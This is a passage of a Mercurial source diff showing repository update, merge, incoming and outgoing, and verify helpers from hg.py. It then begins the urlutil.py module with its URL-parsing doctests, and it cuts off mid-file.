1184 ret = _clean(repo, checkout)
1185 else:
1185 else:
1186 if updatecheck == mergemod.UPDATECHECK_ABORT:
1186 if updatecheck == mergemod.UPDATECHECK_ABORT:
1187 cmdutil.bailifchanged(repo, merge=False)
1187 cmdutil.bailifchanged(repo, merge=False)
1188 updatecheck = mergemod.UPDATECHECK_NONE
1188 updatecheck = mergemod.UPDATECHECK_NONE
1189 ret = _update(repo, checkout, updatecheck=updatecheck)
1189 ret = _update(repo, checkout, updatecheck=updatecheck)
1190
1190
1191 if not ret and movemarkfrom:
1191 if not ret and movemarkfrom:
1192 if movemarkfrom == repo[b'.'].node():
1192 if movemarkfrom == repo[b'.'].node():
1193 pass # no-op update
1193 pass # no-op update
1194 elif bookmarks.update(repo, [movemarkfrom], repo[b'.'].node()):
1194 elif bookmarks.update(repo, [movemarkfrom], repo[b'.'].node()):
1195 b = ui.label(repo._activebookmark, b'bookmarks.active')
1195 b = ui.label(repo._activebookmark, b'bookmarks.active')
1196 ui.status(_(b"updating bookmark %s\n") % b)
1196 ui.status(_(b"updating bookmark %s\n") % b)
1197 else:
1197 else:
1198 # this can happen with a non-linear update
1198 # this can happen with a non-linear update
1199 b = ui.label(repo._activebookmark, b'bookmarks')
1199 b = ui.label(repo._activebookmark, b'bookmarks')
1200 ui.status(_(b"(leaving bookmark %s)\n") % b)
1200 ui.status(_(b"(leaving bookmark %s)\n") % b)
1201 bookmarks.deactivate(repo)
1201 bookmarks.deactivate(repo)
1202 elif brev in repo._bookmarks:
1202 elif brev in repo._bookmarks:
1203 if brev != repo._activebookmark:
1203 if brev != repo._activebookmark:
1204 b = ui.label(brev, b'bookmarks.active')
1204 b = ui.label(brev, b'bookmarks.active')
1205 ui.status(_(b"(activating bookmark %s)\n") % b)
1205 ui.status(_(b"(activating bookmark %s)\n") % b)
1206 bookmarks.activate(repo, brev)
1206 bookmarks.activate(repo, brev)
1207 elif brev:
1207 elif brev:
1208 if repo._activebookmark:
1208 if repo._activebookmark:
1209 b = ui.label(repo._activebookmark, b'bookmarks')
1209 b = ui.label(repo._activebookmark, b'bookmarks')
1210 ui.status(_(b"(leaving bookmark %s)\n") % b)
1210 ui.status(_(b"(leaving bookmark %s)\n") % b)
1211 bookmarks.deactivate(repo)
1211 bookmarks.deactivate(repo)
1212
1212
1213 if warndest:
1213 if warndest:
1214 destutil.statusotherdests(ui, repo)
1214 destutil.statusotherdests(ui, repo)
1215
1215
1216 return ret
1216 return ret
1217
1217
1218
1218
1219 def merge(
1219 def merge(
1220 ctx,
1220 ctx,
1221 force=False,
1221 force=False,
1222 remind=True,
1222 remind=True,
1223 labels=None,
1223 labels=None,
1224 ):
1224 ):
1225 """Branch merge with node, resolving changes. Return true if any
1225 """Branch merge with node, resolving changes. Return true if any
1226 unresolved conflicts."""
1226 unresolved conflicts."""
1227 repo = ctx.repo()
1227 repo = ctx.repo()
1228 stats = mergemod.merge(ctx, force=force, labels=labels)
1228 stats = mergemod.merge(ctx, force=force, labels=labels)
1229 _showstats(repo, stats)
1229 _showstats(repo, stats)
1230 if stats.unresolvedcount:
1230 if stats.unresolvedcount:
1231 repo.ui.status(
1231 repo.ui.status(
1232 _(
1232 _(
1233 b"use 'hg resolve' to retry unresolved file merges "
1233 b"use 'hg resolve' to retry unresolved file merges "
1234 b"or 'hg merge --abort' to abandon\n"
1234 b"or 'hg merge --abort' to abandon\n"
1235 )
1235 )
1236 )
1236 )
1237 elif remind:
1237 elif remind:
1238 repo.ui.status(_(b"(branch merge, don't forget to commit)\n"))
1238 repo.ui.status(_(b"(branch merge, don't forget to commit)\n"))
1239 return stats.unresolvedcount > 0
1239 return stats.unresolvedcount > 0
1240
1240
1241
1241
1242 def abortmerge(ui, repo):
1242 def abortmerge(ui, repo):
1243 ms = mergestatemod.mergestate.read(repo)
1243 ms = mergestatemod.mergestate.read(repo)
1244 if ms.active():
1244 if ms.active():
1245 # there were conflicts
1245 # there were conflicts
1246 node = ms.localctx.hex()
1246 node = ms.localctx.hex()
1247 else:
1247 else:
1248 # there were no conficts, mergestate was not stored
1248 # there were no conficts, mergestate was not stored
1249 node = repo[b'.'].hex()
1249 node = repo[b'.'].hex()
1250
1250
1251 repo.ui.status(_(b"aborting the merge, updating back to %s\n") % node[:12])
1251 repo.ui.status(_(b"aborting the merge, updating back to %s\n") % node[:12])
1252 stats = mergemod.clean_update(repo[node])
1252 stats = mergemod.clean_update(repo[node])
1253 assert stats.unresolvedcount == 0
1253 assert stats.unresolvedcount == 0
1254 _showstats(repo, stats)
1254 _showstats(repo, stats)
1255
1255
1256
1256
1257 def _incoming(
1257 def _incoming(
1258 displaychlist, subreporecurse, ui, repo, source, opts, buffered=False
1258 displaychlist, subreporecurse, ui, repo, source, opts, buffered=False
1259 ):
1259 ):
1260 """
1260 """
1261 Helper for incoming / gincoming.
1261 Helper for incoming / gincoming.
1262 displaychlist gets called with
1262 displaychlist gets called with
1263 (remoterepo, incomingchangesetlist, displayer) parameters,
1263 (remoterepo, incomingchangesetlist, displayer) parameters,
1264 and is supposed to contain only code that can't be unified.
1264 and is supposed to contain only code that can't be unified.
1265 """
1265 """
1266 srcs = urlutil.get_pull_paths(repo, ui, [source], opts.get(b'branch'))
1266 srcs = urlutil.get_pull_paths(repo, ui, [source], opts.get(b'branch'))
1267 srcs = list(srcs)
1267 srcs = list(srcs)
1268 if len(srcs) != 1:
1268 if len(srcs) != 1:
1269 msg = _('for now, incoming supports only a single source, %d provided')
1269 msg = _('for now, incoming supports only a single source, %d provided')
1270 msg %= len(srcs)
1270 msg %= len(srcs)
1271 raise error.Abort(msg)
1271 raise error.Abort(msg)
1272 source, branches = srcs[0]
1272 source, branches = srcs[0]
1273 other = peer(repo, opts, source)
1273 other = peer(repo, opts, source)
1274 cleanupfn = other.close
1274 cleanupfn = other.close
1275 try:
1275 try:
1276 ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(source))
1276 ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(source))
1277 revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev'))
1277 revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev'))
1278
1278
1279 if revs:
1279 if revs:
1280 revs = [other.lookup(rev) for rev in revs]
1280 revs = [other.lookup(rev) for rev in revs]
1281 other, chlist, cleanupfn = bundlerepo.getremotechanges(
1281 other, chlist, cleanupfn = bundlerepo.getremotechanges(
1282 ui, repo, other, revs, opts[b"bundle"], opts[b"force"]
1282 ui, repo, other, revs, opts[b"bundle"], opts[b"force"]
1283 )
1283 )
1284
1284
1285 if not chlist:
1285 if not chlist:
1286 ui.status(_(b"no changes found\n"))
1286 ui.status(_(b"no changes found\n"))
1287 return subreporecurse()
1287 return subreporecurse()
1288 ui.pager(b'incoming')
1288 ui.pager(b'incoming')
1289 displayer = logcmdutil.changesetdisplayer(
1289 displayer = logcmdutil.changesetdisplayer(
1290 ui, other, opts, buffered=buffered
1290 ui, other, opts, buffered=buffered
1291 )
1291 )
1292 displaychlist(other, chlist, displayer)
1292 displaychlist(other, chlist, displayer)
1293 displayer.close()
1293 displayer.close()
1294 finally:
1294 finally:
1295 cleanupfn()
1295 cleanupfn()
1296 subreporecurse()
1296 subreporecurse()
1297 return 0 # exit code is zero since we found incoming changes
1297 return 0 # exit code is zero since we found incoming changes
1298
1298
1299
1299
1300 def incoming(ui, repo, source, opts):
1300 def incoming(ui, repo, source, opts):
1301 def subreporecurse():
1301 def subreporecurse():
1302 ret = 1
1302 ret = 1
1303 if opts.get(b'subrepos'):
1303 if opts.get(b'subrepos'):
1304 ctx = repo[None]
1304 ctx = repo[None]
1305 for subpath in sorted(ctx.substate):
1305 for subpath in sorted(ctx.substate):
1306 sub = ctx.sub(subpath)
1306 sub = ctx.sub(subpath)
1307 ret = min(ret, sub.incoming(ui, source, opts))
1307 ret = min(ret, sub.incoming(ui, source, opts))
1308 return ret
1308 return ret
1309
1309
1310 def display(other, chlist, displayer):
1310 def display(other, chlist, displayer):
1311 limit = logcmdutil.getlimit(opts)
1311 limit = logcmdutil.getlimit(opts)
1312 if opts.get(b'newest_first'):
1312 if opts.get(b'newest_first'):
1313 chlist.reverse()
1313 chlist.reverse()
1314 count = 0
1314 count = 0
1315 for n in chlist:
1315 for n in chlist:
1316 if limit is not None and count >= limit:
1316 if limit is not None and count >= limit:
1317 break
1317 break
1318 parents = [p for p in other.changelog.parents(n) if p != nullid]
1318 parents = [p for p in other.changelog.parents(n) if p != nullid]
1319 if opts.get(b'no_merges') and len(parents) == 2:
1319 if opts.get(b'no_merges') and len(parents) == 2:
1320 continue
1320 continue
1321 count += 1
1321 count += 1
1322 displayer.show(other[n])
1322 displayer.show(other[n])
1323
1323
1324 return _incoming(display, subreporecurse, ui, repo, source, opts)
1324 return _incoming(display, subreporecurse, ui, repo, source, opts)
1325
1325
1326
1326
1327 def _outgoing(ui, repo, dests, opts, subpath=None):
1327 def _outgoing(ui, repo, dests, opts, subpath=None):
1328 out = set()
1328 out = set()
1329 others = []
1329 others = []
1330 for path in urlutil.get_push_paths(repo, ui, dests):
1330 for path in urlutil.get_push_paths(repo, ui, dests):
1331 dest = path.pushloc or path.loc
1331 dest = path.pushloc or path.loc
1332 if subpath is not None:
1332 if subpath is not None:
1333 subpath = urlutil.url(subpath)
1333 subpath = urlutil.url(subpath)
1334 if subpath.isabs():
1334 if subpath.isabs():
1335 dest = bytes(subpath)
1335 dest = bytes(subpath)
1336 else:
1336 else:
1337 p = urlutil.url(dest)
1337 p = urlutil.url(dest)
1338 p.path = os.path.normpath(b'%s/%s' % (p.path, subpath))
1338 p.path = os.path.normpath(b'%s/%s' % (p.path, subpath))
1339 dest = bytes(p)
1339 dest = bytes(p)
1340 branches = path.branch, opts.get(b'branch') or []
1340 branches = path.branch, opts.get(b'branch') or []
1341
1341
1342 ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest))
1342 ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest))
1343 revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev'))
1343 revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev'))
1344 if revs:
1344 if revs:
1345 revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)]
1345 revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)]
1346
1346
1347 other = peer(repo, opts, dest)
1347 other = peer(repo, opts, dest)
1348 try:
1348 try:
1349 outgoing = discovery.findcommonoutgoing(
1349 outgoing = discovery.findcommonoutgoing(
1350 repo, other, revs, force=opts.get(b'force')
1350 repo, other, revs, force=opts.get(b'force')
1351 )
1351 )
1352 o = outgoing.missing
1352 o = outgoing.missing
1353 out.update(o)
1353 out.update(o)
1354 if not o:
1354 if not o:
1355 scmutil.nochangesfound(repo.ui, repo, outgoing.excluded)
1355 scmutil.nochangesfound(repo.ui, repo, outgoing.excluded)
1356 others.append(other)
1356 others.append(other)
1357 except: # re-raises
1357 except: # re-raises
1358 other.close()
1358 other.close()
1359 raise
1359 raise
1360 # make sure this is ordered by revision number
1360 # make sure this is ordered by revision number
1361 outgoing_revs = list(out)
1361 outgoing_revs = list(out)
1362 cl = repo.changelog
1362 cl = repo.changelog
1363 outgoing_revs.sort(key=cl.rev)
1363 outgoing_revs.sort(key=cl.rev)
1364 return outgoing_revs, others
1364 return outgoing_revs, others
1365
1365
1366
1366
1367 def _outgoing_recurse(ui, repo, dests, opts):
1367 def _outgoing_recurse(ui, repo, dests, opts):
1368 ret = 1
1368 ret = 1
1369 if opts.get(b'subrepos'):
1369 if opts.get(b'subrepos'):
1370 ctx = repo[None]
1370 ctx = repo[None]
1371 for subpath in sorted(ctx.substate):
1371 for subpath in sorted(ctx.substate):
1372 sub = ctx.sub(subpath)
1372 sub = ctx.sub(subpath)
1373 ret = min(ret, sub.outgoing(ui, dests, opts))
1373 ret = min(ret, sub.outgoing(ui, dests, opts))
1374 return ret
1374 return ret
1375
1375
1376
1376
1377 def _outgoing_filter(repo, revs, opts):
1377 def _outgoing_filter(repo, revs, opts):
1378 """apply revision filtering/ordering option for outgoing"""
1378 """apply revision filtering/ordering option for outgoing"""
1379 limit = logcmdutil.getlimit(opts)
1379 limit = logcmdutil.getlimit(opts)
1380 no_merges = opts.get(b'no_merges')
1380 no_merges = opts.get(b'no_merges')
1381 if opts.get(b'newest_first'):
1381 if opts.get(b'newest_first'):
1382 revs.reverse()
1382 revs.reverse()
1383 if limit is None and not no_merges:
1383 if limit is None and not no_merges:
1384 for r in revs:
1384 for r in revs:
1385 yield r
1385 yield r
1386 return
1386 return
1387
1387
1388 count = 0
1388 count = 0
1389 cl = repo.changelog
1389 cl = repo.changelog
1390 for n in revs:
1390 for n in revs:
1391 if limit is not None and count >= limit:
1391 if limit is not None and count >= limit:
1392 break
1392 break
1393 parents = [p for p in cl.parents(n) if p != nullid]
1393 parents = [p for p in cl.parents(n) if p != nullid]
1394 if no_merges and len(parents) == 2:
1394 if no_merges and len(parents) == 2:
1395 continue
1395 continue
1396 count += 1
1396 count += 1
1397 yield n
1397 yield n
1398
1398
1399
1399
1400 def outgoing(ui, repo, dests, opts, subpath=None):
1400 def outgoing(ui, repo, dests, opts, subpath=None):
1401 if opts.get(b'graph'):
1401 if opts.get(b'graph'):
1402 logcmdutil.checkunsupportedgraphflags([], opts)
1402 logcmdutil.checkunsupportedgraphflags([], opts)
1403 o, others = _outgoing(ui, repo, dests, opts, subpath=subpath)
1403 o, others = _outgoing(ui, repo, dests, opts, subpath=subpath)
1404 ret = 1
1404 ret = 1
1405 try:
1405 try:
1406 if o:
1406 if o:
1407 ret = 0
1407 ret = 0
1408
1408
1409 if opts.get(b'graph'):
1409 if opts.get(b'graph'):
1410 revdag = logcmdutil.graphrevs(repo, o, opts)
1410 revdag = logcmdutil.graphrevs(repo, o, opts)
1411 ui.pager(b'outgoing')
1411 ui.pager(b'outgoing')
1412 displayer = logcmdutil.changesetdisplayer(
1412 displayer = logcmdutil.changesetdisplayer(
1413 ui, repo, opts, buffered=True
1413 ui, repo, opts, buffered=True
1414 )
1414 )
1415 logcmdutil.displaygraph(
1415 logcmdutil.displaygraph(
1416 ui, repo, revdag, displayer, graphmod.asciiedges
1416 ui, repo, revdag, displayer, graphmod.asciiedges
1417 )
1417 )
1418 else:
1418 else:
1419 ui.pager(b'outgoing')
1419 ui.pager(b'outgoing')
1420 displayer = logcmdutil.changesetdisplayer(ui, repo, opts)
1420 displayer = logcmdutil.changesetdisplayer(ui, repo, opts)
1421 for n in _outgoing_filter(repo, o, opts):
1421 for n in _outgoing_filter(repo, o, opts):
1422 displayer.show(repo[n])
1422 displayer.show(repo[n])
1423 displayer.close()
1423 displayer.close()
1424 for oth in others:
1424 for oth in others:
1425 cmdutil.outgoinghooks(ui, repo, oth, opts, o)
1425 cmdutil.outgoinghooks(ui, repo, oth, opts, o)
1426 ret = min(ret, _outgoing_recurse(ui, repo, dests, opts))
1426 ret = min(ret, _outgoing_recurse(ui, repo, dests, opts))
1427 return ret # exit code is zero since we found outgoing changes
1427 return ret # exit code is zero since we found outgoing changes
1428 finally:
1428 finally:
1429 for oth in others:
1429 for oth in others:
1430 oth.close()
1430 oth.close()
1431
1431
1432
1432
1433 def verify(repo, level=None):
1433 def verify(repo, level=None):
1434 """verify the consistency of a repository"""
1434 """verify the consistency of a repository"""
1435 ret = verifymod.verify(repo, level=level)
1435 ret = verifymod.verify(repo, level=level)
1436
1436
1437 # Broken subrepo references in hidden csets don't seem worth worrying about,
1437 # Broken subrepo references in hidden csets don't seem worth worrying about,
1438 # since they can't be pushed/pulled, and --hidden can be used if they are a
1438 # since they can't be pushed/pulled, and --hidden can be used if they are a
1439 # concern.
1439 # concern.
1440
1440
1441 # pathto() is needed for -R case
1441 # pathto() is needed for -R case
1442 revs = repo.revs(
1442 revs = repo.revs(
1443 b"filelog(%s)", util.pathto(repo.root, repo.getcwd(), b'.hgsubstate')
1443 b"filelog(%s)", util.pathto(repo.root, repo.getcwd(), b'.hgsubstate')
1444 )
1444 )
1445
1445
1446 if revs:
1446 if revs:
1447 repo.ui.status(_(b'checking subrepo links\n'))
1447 repo.ui.status(_(b'checking subrepo links\n'))
1448 for rev in revs:
1448 for rev in revs:
1449 ctx = repo[rev]
1449 ctx = repo[rev]
1450 try:
1450 try:
1451 for subpath in ctx.substate:
1451 for subpath in ctx.substate:
1452 try:
1452 try:
1453 ret = (
1453 ret = (
1454 ctx.sub(subpath, allowcreate=False).verify() or ret
1454 ctx.sub(subpath, allowcreate=False).verify() or ret
1455 )
1455 )
1456 except error.RepoError as e:
1456 except error.RepoError as e:
1457 repo.ui.warn(b'%d: %s\n' % (rev, e))
1457 repo.ui.warn(b'%d: %s\n' % (rev, e))
1458 except Exception:
1458 except Exception:
1459 repo.ui.warn(
1459 repo.ui.warn(
1460 _(b'.hgsubstate is corrupt in revision %s\n')
1460 _(b'.hgsubstate is corrupt in revision %s\n')
1461 % short(ctx.node())
1461 % short(ctx.node())
1462 )
1462 )
1463
1463
1464 return ret
1464 return ret
1465
1465
1466
1466
1467 def remoteui(src, opts):
1467 def remoteui(src, opts):
1468 """build a remote ui from ui or repo and opts"""
1468 """build a remote ui from ui or repo and opts"""
1469 if util.safehasattr(src, b'baseui'): # looks like a repository
1469 if util.safehasattr(src, b'baseui'): # looks like a repository
1470 dst = src.baseui.copy() # drop repo-specific config
1470 dst = src.baseui.copy() # drop repo-specific config
1471 src = src.ui # copy target options from repo
1471 src = src.ui # copy target options from repo
1472 else: # assume it's a global ui object
1472 else: # assume it's a global ui object
1473 dst = src.copy() # keep all global options
1473 dst = src.copy() # keep all global options
1474
1474
1475 # copy ssh-specific options
1475 # copy ssh-specific options
1476 for o in b'ssh', b'remotecmd':
1476 for o in b'ssh', b'remotecmd':
1477 v = opts.get(o) or src.config(b'ui', o)
1477 v = opts.get(o) or src.config(b'ui', o)
1478 if v:
1478 if v:
1479 dst.setconfig(b"ui", o, v, b'copied')
1479 dst.setconfig(b"ui", o, v, b'copied')
1480
1480
1481 # copy bundle-specific options
1481 # copy bundle-specific options
1482 r = src.config(b'bundle', b'mainreporoot')
1482 r = src.config(b'bundle', b'mainreporoot')
1483 if r:
1483 if r:
1484 dst.setconfig(b'bundle', b'mainreporoot', r, b'copied')
1484 dst.setconfig(b'bundle', b'mainreporoot', r, b'copied')
1485
1485
1486 # copy selected local settings to the remote ui
1486 # copy selected local settings to the remote ui
1487 for sect in (b'auth', b'hostfingerprints', b'hostsecurity', b'http_proxy'):
1487 for sect in (b'auth', b'hostfingerprints', b'hostsecurity', b'http_proxy'):
1488 for key, val in src.configitems(sect):
1488 for key, val in src.configitems(sect):
1489 dst.setconfig(sect, key, val, b'copied')
1489 dst.setconfig(sect, key, val, b'copied')
1490 v = src.config(b'web', b'cacerts')
1490 v = src.config(b'web', b'cacerts')
1491 if v:
1491 if v:
1492 dst.setconfig(b'web', b'cacerts', util.expandpath(v), b'copied')
1492 dst.setconfig(b'web', b'cacerts', util.expandpath(v), b'copied')
1493
1493
1494 return dst
1494 return dst
1495
1495
1496
1496
1497 # Files of interest
1497 # Files of interest
1498 # Used to check if the repository has changed looking at mtime and size of
1498 # Used to check if the repository has changed looking at mtime and size of
1499 # these files.
1499 # these files.
1500 foi = [
1500 foi = [
1501 (b'spath', b'00changelog.i'),
1501 (b'spath', b'00changelog.i'),
1502 (b'spath', b'phaseroots'), # ! phase can change content at the same size
1502 (b'spath', b'phaseroots'), # ! phase can change content at the same size
1503 (b'spath', b'obsstore'),
1503 (b'spath', b'obsstore'),
1504 (b'path', b'bookmarks'), # ! bookmark can change content at the same size
1504 (b'path', b'bookmarks'), # ! bookmark can change content at the same size
1505 ]
1505 ]
1506
1506
1507
1507
1508 class cachedlocalrepo(object):
1508 class cachedlocalrepo(object):
1509 """Holds a localrepository that can be cached and reused."""
1509 """Holds a localrepository that can be cached and reused."""
1510
1510
1511 def __init__(self, repo):
1511 def __init__(self, repo):
1512 """Create a new cached repo from an existing repo.
1512 """Create a new cached repo from an existing repo.
1513
1513
1514 We assume the passed in repo was recently created. If the
1514 We assume the passed in repo was recently created. If the
1515 repo has changed between when it was created and when it was
1515 repo has changed between when it was created and when it was
1516 turned into a cache, it may not refresh properly.
1516 turned into a cache, it may not refresh properly.
1517 """
1517 """
1518 assert isinstance(repo, localrepo.localrepository)
1518 assert isinstance(repo, localrepo.localrepository)
1519 self._repo = repo
1519 self._repo = repo
1520 self._state, self.mtime = self._repostate()
1520 self._state, self.mtime = self._repostate()
1521 self._filtername = repo.filtername
1521 self._filtername = repo.filtername
1522
1522
1523 def fetch(self):
1523 def fetch(self):
1524 """Refresh (if necessary) and return a repository.
1524 """Refresh (if necessary) and return a repository.
1525
1525
1526 If the cached instance is out of date, it will be recreated
1526 If the cached instance is out of date, it will be recreated
1527 automatically and returned.
1527 automatically and returned.
1528
1528
1529 Returns a tuple of the repo and a boolean indicating whether a new
1529 Returns a tuple of the repo and a boolean indicating whether a new
1530 repo instance was created.
1530 repo instance was created.
1531 """
1531 """
1532 # We compare the mtimes and sizes of some well-known files to
1532 # We compare the mtimes and sizes of some well-known files to
1533 # determine if the repo changed. This is not precise, as mtimes
1533 # determine if the repo changed. This is not precise, as mtimes
1534 # are susceptible to clock skew and imprecise filesystems and
1534 # are susceptible to clock skew and imprecise filesystems and
1535 # file content can change while maintaining the same size.
1535 # file content can change while maintaining the same size.
1536
1536
1537 state, mtime = self._repostate()
1537 state, mtime = self._repostate()
1538 if state == self._state:
1538 if state == self._state:
1539 return self._repo, False
1539 return self._repo, False
1540
1540
1541 repo = repository(self._repo.baseui, self._repo.url())
1541 repo = repository(self._repo.baseui, self._repo.url())
1542 if self._filtername:
1542 if self._filtername:
1543 self._repo = repo.filtered(self._filtername)
1543 self._repo = repo.filtered(self._filtername)
1544 else:
1544 else:
1545 self._repo = repo.unfiltered()
1545 self._repo = repo.unfiltered()
1546 self._state = state
1546 self._state = state
1547 self.mtime = mtime
1547 self.mtime = mtime
1548
1548
1549 return self._repo, True
1549 return self._repo, True
1550
1550
1551 def _repostate(self):
1551 def _repostate(self):
1552 state = []
1552 state = []
1553 maxmtime = -1
1553 maxmtime = -1
1554 for attr, fname in foi:
1554 for attr, fname in foi:
1555 prefix = getattr(self._repo, attr)
1555 prefix = getattr(self._repo, attr)
1556 p = os.path.join(prefix, fname)
1556 p = os.path.join(prefix, fname)
1557 try:
1557 try:
1558 st = os.stat(p)
1558 st = os.stat(p)
1559 except OSError:
1559 except OSError:
1560 st = os.stat(prefix)
1560 st = os.stat(prefix)
1561 state.append((st[stat.ST_MTIME], st.st_size))
1561 state.append((st[stat.ST_MTIME], st.st_size))
1562 maxmtime = max(maxmtime, st[stat.ST_MTIME])
1562 maxmtime = max(maxmtime, st[stat.ST_MTIME])
1563
1563
1564 return tuple(state), maxmtime
1564 return tuple(state), maxmtime
1565
1565
1566 def copy(self):
1566 def copy(self):
1567 """Obtain a copy of this class instance.
1567 """Obtain a copy of this class instance.
1568
1568
1569 A new localrepository instance is obtained. The new instance should be
1569 A new localrepository instance is obtained. The new instance should be
1570 completely independent of the original.
1570 completely independent of the original.
1571 """
1571 """
1572 repo = repository(self._repo.baseui, self._repo.origroot)
1572 repo = repository(self._repo.baseui, self._repo.origroot)
1573 if self._filtername:
1573 if self._filtername:
1574 repo = repo.filtered(self._filtername)
1574 repo = repo.filtered(self._filtername)
1575 else:
1575 else:
1576 repo = repo.unfiltered()
1576 repo = repo.unfiltered()
1577 c = cachedlocalrepo(repo)
1577 c = cachedlocalrepo(repo)
1578 c._state = self._state
1578 c._state = self._state
1579 c.mtime = self.mtime
1579 c.mtime = self.mtime
1580 return c
1580 return c
@@ -1,712 +1,719 b''
1 # utils.urlutil - code related to [paths] management
1 # utils.urlutil - code related to [paths] management
2 #
2 #
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
3 # Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 import os
7 import os
8 import re as remod
8 import re as remod
9 import socket
9 import socket
10
10
11 from ..i18n import _
11 from ..i18n import _
12 from ..pycompat import (
12 from ..pycompat import (
13 getattr,
13 getattr,
14 setattr,
14 setattr,
15 )
15 )
16 from .. import (
16 from .. import (
17 encoding,
17 encoding,
18 error,
18 error,
19 pycompat,
19 pycompat,
20 urllibcompat,
20 urllibcompat,
21 )
21 )
22
22
23
23
24 if pycompat.TYPE_CHECKING:
24 if pycompat.TYPE_CHECKING:
25 from typing import (
25 from typing import (
26 Union,
26 Union,
27 )
27 )
28
28
29 urlreq = urllibcompat.urlreq
29 urlreq = urllibcompat.urlreq
30
30
31
31
32 def getport(port):
32 def getport(port):
33 # type: (Union[bytes, int]) -> int
33 # type: (Union[bytes, int]) -> int
34 """Return the port for a given network service.
34 """Return the port for a given network service.
35
35
36 If port is an integer, it's returned as is. If it's a string, it's
36 If port is an integer, it's returned as is. If it's a string, it's
37 looked up using socket.getservbyname(). If there's no matching
37 looked up using socket.getservbyname(). If there's no matching
38 service, error.Abort is raised.
38 service, error.Abort is raised.
39 """
39 """
40 try:
40 try:
41 return int(port)
41 return int(port)
42 except ValueError:
42 except ValueError:
43 pass
43 pass
44
44
45 try:
45 try:
46 return socket.getservbyname(pycompat.sysstr(port))
46 return socket.getservbyname(pycompat.sysstr(port))
47 except socket.error:
47 except socket.error:
48 raise error.Abort(
48 raise error.Abort(
49 _(b"no port number associated with service '%s'") % port
49 _(b"no port number associated with service '%s'") % port
50 )
50 )
51
51
52
52
53 class url(object):
53 class url(object):
54 r"""Reliable URL parser.
54 r"""Reliable URL parser.
55
55
56 This parses URLs and provides attributes for the following
56 This parses URLs and provides attributes for the following
57 components:
57 components:
58
58
59 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
59 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
60
60
61 Missing components are set to None. The only exception is
61 Missing components are set to None. The only exception is
62 fragment, which is set to '' if present but empty.
62 fragment, which is set to '' if present but empty.
63
63
64 If parsefragment is False, fragment is included in query. If
64 If parsefragment is False, fragment is included in query. If
65 parsequery is False, query is included in path. If both are
65 parsequery is False, query is included in path. If both are
66 False, both fragment and query are included in path.
66 False, both fragment and query are included in path.
67
67
68 See http://www.ietf.org/rfc/rfc2396.txt for more information.
68 See http://www.ietf.org/rfc/rfc2396.txt for more information.
69
69
70 Note that for backward compatibility reasons, bundle URLs do not
70 Note that for backward compatibility reasons, bundle URLs do not
71 take host names. That means 'bundle://../' has a path of '../'.
71 take host names. That means 'bundle://../' has a path of '../'.
72
72
73 Examples:
73 Examples:
74
74
75 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
75 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
76 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
76 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
77 >>> url(b'ssh://[::1]:2200//home/joe/repo')
77 >>> url(b'ssh://[::1]:2200//home/joe/repo')
78 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
78 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
79 >>> url(b'file:///home/joe/repo')
79 >>> url(b'file:///home/joe/repo')
80 <url scheme: 'file', path: '/home/joe/repo'>
80 <url scheme: 'file', path: '/home/joe/repo'>
81 >>> url(b'file:///c:/temp/foo/')
81 >>> url(b'file:///c:/temp/foo/')
82 <url scheme: 'file', path: 'c:/temp/foo/'>
82 <url scheme: 'file', path: 'c:/temp/foo/'>
83 >>> url(b'bundle:foo')
83 >>> url(b'bundle:foo')
84 <url scheme: 'bundle', path: 'foo'>
84 <url scheme: 'bundle', path: 'foo'>
85 >>> url(b'bundle://../foo')
85 >>> url(b'bundle://../foo')
86 <url scheme: 'bundle', path: '../foo'>
86 <url scheme: 'bundle', path: '../foo'>
87 >>> url(br'c:\foo\bar')
87 >>> url(br'c:\foo\bar')
88 <url path: 'c:\\foo\\bar'>
88 <url path: 'c:\\foo\\bar'>
89 >>> url(br'\\blah\blah\blah')
89 >>> url(br'\\blah\blah\blah')
90 <url path: '\\\\blah\\blah\\blah'>
90 <url path: '\\\\blah\\blah\\blah'>
91 >>> url(br'\\blah\blah\blah#baz')
91 >>> url(br'\\blah\blah\blah#baz')
92 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
92 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
93 >>> url(br'file:///C:\users\me')
93 >>> url(br'file:///C:\users\me')
94 <url scheme: 'file', path: 'C:\\users\\me'>
94 <url scheme: 'file', path: 'C:\\users\\me'>
95
95
96 Authentication credentials:
96 Authentication credentials:
97
97
98 >>> url(b'ssh://joe:xyz@x/repo')
98 >>> url(b'ssh://joe:xyz@x/repo')
99 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
99 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
100 >>> url(b'ssh://joe@x/repo')
100 >>> url(b'ssh://joe@x/repo')
101 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
101 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
102
102
103 Query strings and fragments:
103 Query strings and fragments:
104
104
105 >>> url(b'http://host/a?b#c')
105 >>> url(b'http://host/a?b#c')
106 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
106 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
